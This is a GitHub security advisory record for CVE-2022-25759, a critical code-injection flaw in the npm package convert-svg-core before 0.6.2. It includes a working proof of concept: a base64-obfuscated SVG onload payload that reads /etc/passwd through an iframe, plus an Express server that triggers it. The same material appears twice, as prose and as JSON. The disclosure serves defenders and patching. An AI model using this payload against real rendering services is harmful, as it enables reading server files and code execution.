GHSA-5GXC-FXCR-9326
Vulnerability from github – Published: 2022-07-23 00:00 – Updated: 2024-04-22 23:21
VLAI?
Summary
convert-svg-core vulnerable to remote code injection
Details
The package convert-svg-core before 0.6.2 is vulnerable to Remote Code Injection via sending an SVG file containing the payload in an onload attribute. Puppeteer/Chromium (used by convert-svg-core) will execute any code within that tag, including malicious code.
PoC
Payload
<svg onload=eval(atob(this.id)) id='ZG9jdW1lbnQud3JpdGUoJzxzdmctZHVtbXk+PC9zdmctZHVtbXk+PGlmcmFtZSBzcmM9ImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwMHB4Ij48L2lmcmFtZT48c3ZnIHZpZXdCb3g9IjAgMCAyNDAgODAiIGhlaWdodD0iMTAwMCIgd2lkdGg9IjEwMDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHRleHQgeD0iMCIgeT0iMCIgY2xhc3M9IlJycnJyIiBpZD0iZGVtbyI+ZGF0YTwvdGV4dD48L3N2Zz4nKTs='></svg>
where the id attribute is the base 64-encoded form of
document.write('<svg-dummy></svg-dummy><iframe src="file:///etc/passwd" width="100%" height="1000px"></iframe><svg viewBox="0 0 240 80" height="1000" width="1000" xmlns="http://www.w3.org/2000/svg"><text x="0" y="0" class="Rrrrr" id="demo">data</text></svg>');
Attack
const { convert } = require('convert-svg-to-png');
const express = require('express');
const fileSvg = `[[[payload]]]`;
// YWxlcnQoMSk=
// function newContent(){document.open(),document.write('<text x=\"0\" y=\"0\" class=\"Rrrrr\" id=\"demo\">data</text>'),document.close()}
const app = express();
app.get('/poc', async (req, res)=>{
try {
const png = await convert(fileSvg);
res.set('Content-Type', 'image/png');
res.send(png);
} catch (e) {
console.log(e);
res.send("");
}
});
app.listen(3000, ()=>{
console.log('started');
});
Severity ?
9.8 (Critical)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "convert-svg-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.6.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-25759"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2024-04-22T23:21:54Z",
"nvd_published_at": "2022-07-22T20:15:00Z",
"severity": "CRITICAL"
},
"details": "The package convert-svg-core before 0.6.2 is vulnerable to Remote Code Injection via sending an SVG file containing the payload in an `onload` attribute. Puppeteer/Chromium (used by convert-svg-core) will execute any code within that tag, including malicious code.\n\n### PoC\n\n**Payload**\n\n```html\n\u003csvg onload=eval(atob(this.id)) id=\u0027ZG9jdW1lbnQud3JpdGUoJzxzdmctZHVtbXk+PC9zdmctZHVtbXk+PGlmcmFtZSBzcmM9ImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwMHB4Ij48L2lmcmFtZT48c3ZnIHZpZXdCb3g9IjAgMCAyNDAgODAiIGhlaWdodD0iMTAwMCIgd2lkdGg9IjEwMDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHRleHQgeD0iMCIgeT0iMCIgY2xhc3M9IlJycnJyIiBpZD0iZGVtbyI+ZGF0YTwvdGV4dD48L3N2Zz4nKTs=\u0027\u003e\u003c/svg\u003e\n```\nwhere the `id` attribute is the base 64-encoded form of \n\n```js\ndocument.write(\u0027\u003csvg-dummy\u003e\u003c/svg-dummy\u003e\u003ciframe src=\"file:///etc/passwd\" width=\"100%\" height=\"1000px\"\u003e\u003c/iframe\u003e\u003csvg viewBox=\"0 0 240 80\" height=\"1000\" width=\"1000\" xmlns=\"http://www.w3.org/2000/svg\"\u003e\u003ctext x=\"0\" y=\"0\" class=\"Rrrrr\" id=\"demo\"\u003edata\u003c/text\u003e\u003c/svg\u003e\u0027);\n```\n\n\n**Attack**\n\n```js\nconst { convert } = require(\u0027convert-svg-to-png\u0027);\nconst express = require(\u0027express\u0027);\nconst fileSvg = `[[[payload]]]`;\n// YWxlcnQoMSk=\n// function newContent(){document.open(),document.write(\u0027\u003ctext x=\\\"0\\\" y=\\\"0\\\" class=\\\"Rrrrr\\\" id=\\\"demo\\\"\u003edata\u003c/text\u003e\u0027),document.close()}\nconst app = express();\napp.get(\u0027/poc\u0027, async (req, res)=\u003e{\n try {\n const png = await convert(fileSvg);\n res.set(\u0027Content-Type\u0027, \u0027image/png\u0027);\n res.send(png);\n } catch (e) {\n console.log(e);\n res.send(\"\");\n }\n});\napp.listen(3000, ()=\u003e{\n console.log(\u0027started\u0027);\n});\n```",
"id": "GHSA-5gxc-fxcr-9326",
"modified": "2024-04-22T23:21:54Z",
"published": "2022-07-23T00:00:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25759"
},
{
"type": "WEB",
"url": "https://github.com/neocotic/convert-svg/issues/81"
},
{
"type": "WEB",
"url": "https://github.com/neocotic/convert-svg/pull/82"
},
{
"type": "WEB",
"url": "https://github.com/neocotic/convert-svg/commit/7e6031ac7427cf82cf312cb4a25040f2e6efe7a5"
},
{
"type": "PACKAGE",
"url": "https://github.com/neocotic/convert-svg"
},
{
"type": "WEB",
"url": "https://security.snyk.io/vuln/SNYK-JS-CONVERTSVGCORE-2849633"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "convert-svg-core vulnerable to remote code injection"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…